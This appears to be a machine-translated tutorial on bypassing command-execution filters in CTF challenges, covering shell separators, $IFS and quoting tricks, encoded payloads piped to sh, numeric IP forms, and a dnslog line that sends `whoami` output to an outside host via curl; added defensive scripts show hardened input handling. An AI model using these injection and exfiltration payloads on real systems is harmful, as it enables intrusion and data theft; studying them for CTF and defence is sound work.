2025-04-01 Update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
The editor shares with you the ways of bypassing command-execution filters in CTF. I believe most people do not know much about this, so this article is shared for your reference; I hope you will learn a lot after reading it. Let's get into it!
For reference, study and use only
0x01: pipe symbol
When using Linux commands, we can execute several commands on one line, or execute the next command conditionally. Below we explain the use of the semicolon, &&, &, | and || in Linux commands.
Semicolon usage
Method: command1; command2
Separate the commands with the ; sign. The commands are executed in order from left to right; whether or not one of them fails, all of them are executed.
"|" pipe symbol usage
The output of the previous command is used as the input of the next command. In a CTF: ping 127.0.0.1 | ls (in effect only ls runs; the output of the previous command is discarded).
Method: command1 | command2
The pipe character "|" provided by Linux separates the two commands, and the output of the command on the left side of the pipe is used as the input of the command on the right side. Chaining pipes means that the output of the first command becomes the input of the second, the output of the second becomes the input of the third, and so on.
Using a single pipe:
rpm -qa | grep licq
This command creates one pipe with the pipe character "|". The pipeline takes the output of rpm -qa (all RPM packages installed on the system) as the input of grep, and so lists the RPM packages whose names contain "licq".
Using multiple pipes:
cat /etc/passwd | grep /bin/bash | wc -l
This command uses two pipes. The first sends the output of cat (the contents of the passwd file) to grep, which picks out every line containing "/bin/bash"; the second sends the output of grep to wc, which counts the lines of its input. The command therefore reports how many users on the system use bash.
The usage of the "&" symbol
Usage in CTF: ping 127.0.0.1 & ls (ls is executed first, then ping)
Placing & after the command line sets the process as a background process.
Method: command1 &
By default a process runs in the foreground, so it occupies the shell and we cannot do anything else. For processes that need no interaction we usually want to start them in the background, which we do by adding an '&' to the command line.
The usage of the "&&" symbol
Usage in CTF: ping 127.0.0.1 && ls (ls is executed only if the ping command succeeds; with ping 1 && ls, ls will not be executed)
When the shell executes a command, it returns a return value, which is saved in the shell variable $?. When $? == 0 the execution succeeded; when $? == 1 (the author notes this is really any non-zero value; the return value lies between 0 and 255) the execution failed.
Sometimes the next command depends on whether the previous one succeeded: for example, run a second command only after the first one succeeds, or only after it fails. The shell provides && and || to control this; it decides whether to run the subsequent command based on the return value of the previous one.
The syntax format is as follows:
command1 && command2 [&& command3 ...]
Connecting commands with && implements logical AND.
Only if the command on the left of && returns true (return value $? == 0) will the command on the right of && be executed.
As soon as one command returns false (return value $? == 1), the subsequent commands are not executed.
"||" symbol usage
The opposite of &&: command two is executed when the left side is false.
The function of logical OR
The syntax format is as follows:
command1 || command2 [|| command3 ...]
Connecting commands with "||" implements logical OR.
Only if the command on the left returns false (return value $? == 1) will the command on the right be executed. This matches the logical-OR syntax of the C language, that is, a short-circuit logical OR.
As soon as one command returns true (return value $? == 0), the subsequent commands are not executed: execution stops at the first command that returns true.
For example, using the ping command to determine whether a host is alive:
ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 || result=1
if [ "$result" == 0 ]; then
    echo "192.168.1.1 is UP!"
else
    echo "192.168.1.1 is DOWN!"
fi
Note that &> is written together, without a space.
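The operators of this section, worked through in one runnable script. This is an added example, not code from the article: every operator is exercised inside a fresh "sh -c" so the result does not depend on the options of the shell you paste it into, and the passwd-style data is constructed rather than read from the system.

```shell
#!/bin/sh
# Added example (not from the article): the ; | & && || operators and $? from
# section 0x01. The passwd-style sample below is constructed.

# Constructed passwd sample: three accounts, two of them with /bin/bash as shell.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash'

# Two pipes, same shape as: cat /etc/passwd | grep /bin/bash | wc -l
# printf feeds grep, grep feeds wc; tr strips the padding some wc builds add.
count_bash_users() {
    printf '%s\n' "$SAMPLE_PASSWD" | grep '/bin/bash' | wc -l | tr -d ' '
}

# A pipe into a command that ignores stdin: both sides run, but only the right
# side's output is visible. This is the "ping 127.0.0.1 | ls" case from the text.
pipe_into_ignoring_reader() {
    sh -c 'echo probe-output | echo listed'
}

# Capture an exit status without letting a failure abort the caller:
# "cmd || rc=$?" assigns only when cmd fails, so rc stays 0 on success.
exit_code_of() {
    rc=0
    "$@" || rc=$?
    echo "$rc"
}

# ';' runs the second command whatever the first one returned.
run_semicolon() {
    sh -c 'false; echo ran'
}

# '&&' runs the right side only when the left side returned 0; the list as a
# whole then carries the failing status, which the trailing echo shows.
run_and() {
    sh -c 'false && echo ran; echo "status=$?"'
}

# '||' runs the right side only when the left side returned non-zero.
run_or() {
    sh -c 'false || echo fallback'
}

# The article's host-check pattern with the probe replaced by any command:
# "cmd && echo UP || echo DOWN" prints UP on status 0, DOWN otherwise.
status_word() {
    "$@" > /dev/null 2>&1 && echo UP || echo DOWN
}

# '&' puts the left command in the background; the right one starts at once.
# wait reaps the background job before the function returns.
run_background() {
    sh -c 'sleep 1 & echo started; wait'
}

count_bash_users              # 2
pipe_into_ignoring_reader     # listed
exit_code_of false            # 1
exit_code_of sh -c 'exit 7'   # 7
run_semicolon                 # ran
run_and                       # status=1
run_or                        # fallback
status_word true              # UP
status_word false             # DOWN
run_background                # started
```

The exit_code_of helper is the safe way to read $? in scripts that run under set -e: a bare "cmd; rc=$?" would abort before the assignment, while "cmd || rc=$?" is itself an || list and so is allowed to fail.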
0x02: some ways to bypass space filtering under Linux
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat key.php
Inline execution:
Payload: cat$IFS$1`ls`
Inline execution takes the output of the command inside the backquotes as the input of the preceding command, so when we enter the above payload it is equivalent to cat flag.php;cat index.php.
Using DNS resolution (dnslog) as a channel:
Here is an online site that can be used directly: admin.dnslog.link. Register an account and it assigns you a subdomain that can be used.
|| curl `whoami`.xxxx.xxx (subdomain name) |
This way you will see the result reflected in the site's log. (There is no demonstration here; the account has been forgotten.) whoami is wrapped in backquotes because backquotes are special symbols that execute a command under Linux. For more information, see:
http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ
Convert a network address to a numeric address
There is another representation of a network address: a dotted address such as 127.0.0.1 can be converted to the number 2130706433.
It can be accessed directly as
http://2130706433
or http://0x7F000001.
So IP filtering can be bypassed this way. Here is a conversion site:
http://www.msxindl.com/tools/ip/ip_num.asp
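The arithmetic behind the two URLs above, as an added example that is not part of the article and does not use the conversion site: the functions turn a dotted address into its decimal and hex forms and back, and canonical_ip is the step a host filter should run so that 127.0.0.1, 2130706433 and 0x7F000001 are all compared in one form. Plain POSIX sh, no external tools beyond printf.

```shell
#!/bin/sh
# Added example (not from the article): the conversion behind http://2130706433
# and http://0x7F000001, plus a canonicalising step a host filter can run so
# that all three spellings of an address are compared in one form.

# Dotted quad -> 32-bit integer: each octet is one base-256 digit.
# IFS is set to "." so that "set -- $1" splits the address into four fields.
ip_to_int() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# 32-bit integer -> the 0x-prefixed hex form a URL parser also accepts.
int_to_hex() {
    printf '0x%08X\n' "$1"
}

# 32-bit integer -> dotted quad, peeling one base-256 digit at a time.
int_to_ip() {
    n=$1
    echo "$(( n / 16777216 % 256 )).$(( n / 65536 % 256 )).$(( n / 256 % 256 )).$(( n % 256 ))"
}

# Canonicalise a host given as dotted quad, plain decimal or 0x hex to dotted
# form, so an allow/deny list sees only one representation. Shell arithmetic
# parses the decimal and hex literals itself; note that it also treats a
# leading 0 as octal, which a real filter should reject or handle explicitly.
canonical_ip() {
    case $1 in
        *.*) int_to_ip "$(ip_to_int "$1")" ;;
        *)   int_to_ip "$(( $1 ))" ;;
    esac
}

ip_to_int 127.0.0.1          # 2130706433
int_to_hex 2130706433        # 0x7F000001
int_to_ip 2130706433         # 127.0.0.1
canonical_ip 0x7F000001      # 127.0.0.1
canonical_ip 192.168.1.1     # 192.168.1.1
```

A filter that compares the raw host string against "127.0.0.1" misses the other two spellings; comparing canonical_ip of the host instead closes that gap for the forms shown here.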
Viewing file permissions and granting permissions with chmod 777, with the command names split by quotes:
l's' -la
c'h'm'o'd 777 /filename
Commands in place of cat:
cat: displays the content starting from the first line and outputs everything
tac: displays the content in reverse order starting from the last line and outputs everything
more: displays the file content one page at a time according to the window size
less: similar to more, but can also page backwards and search for characters
head: shows only the first few lines
tail: shows only the last few lines
nl: similar to cat -n, prints line numbers with the output
tailf: similar to tail -f
sort%20/flag reads the file (%20 is the URL-encoded space)
dir views the files in the current directory
Fancy ways of reading file content under Linux
PS: the goal is to get the content of flag.txt
static-sh reads the file:
static-sh ./flag.txt
# output:
./flag.txt: line 1: flag{this_is_a_test}: not found
paste reads the file:
paste ./flag.txt /etc/passwd
# output:
flag{this_is_a_test}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
diff reads the file:
diff ./flag.txt /etc/passwd
# output:
1c1,45
< flag{this_is_a_test}
\ No newline at end of file
---
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
od reads the file:
od -a ./flag.txt
# output:
0000000   f   l   a   g   {   t   h   i   s   _   i   s   _   a   _   t
0000020   e   s   t   }
0000024
bzmore reads the file:
bzmore ./flag.txt
bzless reads the file:
bzless ./flag.txt
echo `bzless ./room.txt`
# output:
-> ./flag.txt key.txt
wget for reading from the target:
wget url -P path
Some command delimiters
In Linux: %0a, %0d, ;, &, |, &&, ||
In Windows: %0a, &, | (and a character that plays a magical role as a command delimiter in .bat files)
If bash is filtered, use sh:
echo$IFS$1Y2F0IGZsYWcucGhw | base64$IFS$1-d | sh
Splicing the file name from variables: a=ag.php;b=fl;cat $b$a
There is also a kind of filter that the above method cannot bypass: a check that applies the regex /.*f.*l.*a.*g.*/ to the input ($ip) and calls die("fxck your flag!") on a match. We only need to change the order of the assignments so that the letters f, l, a, g never appear in that order in the payload: 1;a=ag.php;b=fl;cat$IFS$1$b$a
Encoding bypass
Base64:
echo YWJjZGU= | base64 -d // prints abcde
echo Y2F0IGZsYWcucGhw | base64 -d | bash // cat flag.php
echo Y2F0IGZsYWcucGhw | base64 -d | sh // cat flag.php
Hex encoding bypass:
echo 63617420666c61672e706870 | xxd -r -p | bash // cat flag.php
Unicode coding
$(printf "\154\163") // ls
$(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70") // cat flag.php
Keywords can also be bypassed with single quotes and backslashes, for example cat fl''ag or cat fl\ag
To sum up, the payloads are 1;a=ag.php;b=fl;cat$IFS$1$b$a and cat$IFS$1`ls`
Then view the page source to get the flag.
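Everything above, from the separators in 0x01 to the $IFS, quoting and encoding tricks, works for one reason: the input is pasted into a command string that a shell then parses as code. The script below is an added example, not from the article, that puts the vulnerable shape (a string handed to "sh -c", the same shape as system("ping -c 1 " . $ip) in a CTF web app) beside the hardened one (the input passed as a single argv element) and adds an allow-list check that rejects every bypass form on this page as a whole instead of stripping characters one by one. echo stands in for ping so the demonstration is harmless to run; the payload strings are constructed from the page's own examples.

```shell
#!/bin/sh
# Added example (not from the article): vulnerable vs. hardened command
# building, and an allow-list validator for an IPv4 parameter.

# VULNERABLE: the input is interpolated into a string that a new shell parses,
# so ; | && $IFS and backquotes inside it become syntax.
echo_via_string() {
    sh -c "echo $1"
}

# HARDENED: the input is one argument; no shell ever re-parses it.
echo_via_argv() {
    echo "$1"
}

# Allow-list check: accept only a plain dotted IPv4 address.
# Step 1 rejects any byte outside digits and dots. This is done with a case
# pattern rather than grep because grep is line-oriented: an input such as
# "127.0.0.1<newline>ls" (the %0a delimiter from the text) would have its
# first line match a ^...$ regex and slip through.
# Step 2 checks the four-field shape, step 3 the 0..255 range of each octet.
is_ipv4() {
    case $1 in
        *[!0-9.]*|'') return 1 ;;
    esac
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# What a web handler would call: validate first, then pass the value as argv.
# The real call would be: ping -c 1 "$1" (quoted, never inside sh -c).
ping_host() {
    if is_ipv4 "$1"; then
        echo "would run: ping -c 1 $1"
    else
        echo "rejected"
    fi
}

# Constructed payload in the shape of the article's $IFS bypass.
PAYLOAD='127.0.0.1;echo$IFS$1INJECTED'
echo_via_string "$PAYLOAD"   # 127.0.0.1 then INJECTED: the second command ran
echo_via_argv "$PAYLOAD"     # the payload printed back literally
ping_host 127.0.0.1          # would run: ping -c 1 127.0.0.1
ping_host "$PAYLOAD"         # rejected
```

The order of the checks matters: the case pattern is the real gate, because it rejects the whole input on any unexpected byte (space, newline, $, backquote, braces, quotes) without having to enumerate every trick on this page; the regex and range checks only confirm that what remains is an address.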
The above is the whole content of this article, "What are the ways to bypass command execution filters in CTF?" Thank you for reading! I believe you now have a certain understanding of it; I hope the shared content helps you. If you want to learn more, welcome to follow the industry information channel!